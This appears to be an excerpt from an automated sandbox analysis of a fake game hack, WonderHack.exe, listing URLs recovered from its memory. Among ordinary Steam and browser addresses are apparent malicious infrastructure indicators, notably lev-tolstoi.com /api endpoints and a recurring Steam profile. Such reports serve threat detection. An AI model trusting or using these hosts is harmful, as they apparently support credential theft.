Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/HU
Source: WonderHack.exe, 00000002.00000003.2527263074.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/HU~
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin6
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.comE
                    Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: WonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/(
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/((
                    Source: WonderHack.exe, 00000002.00000003.2430190206.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api6M
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apig
                    Source: WonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apit
                    Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/i
                    Source: WonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: WonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453432872.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453505070.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453622723.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453716881.00000000032EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sH
                    Source: WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sY
                    Source: WonderHack.exe, 00000002.00000003.2527263074.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.s
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.n
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900%kt
                    Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: WonderHack.exe, 00000002.00000003.2431470081.0000000003385000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: WonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
